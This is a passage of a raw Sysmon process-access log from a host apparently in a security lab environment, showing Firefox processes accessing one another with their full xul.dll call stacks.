Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 
10341000x800000000000000016719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c841|C:\Program Files\Mozilla Firefox\xul.dll+1722d45|C:\Program Files\Mozilla Firefox\xul.dll+1723f6f|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c641|C:\Program Files\Mozilla Firefox\xul.dll+1722afd|C:\Program Files\Mozilla Firefox\xul.dll+1723f67|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla 
Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c441|C:\Program Files\Mozilla Firefox\xul.dll+172286f|C:\Program Files\Mozilla Firefox\xul.dll+1723f5f|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program 
Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.948{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program 
Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.948{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla 
Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.927{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba6854|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e|C:\Program Files\Mozilla Firefox\xul.dll+2123438|C:\Program Files\Mozilla Firefox\xul.dll+24095e|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+107a9c 10341000x800000000000000016914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla 
Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla 
Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program 
Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla 
Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla 
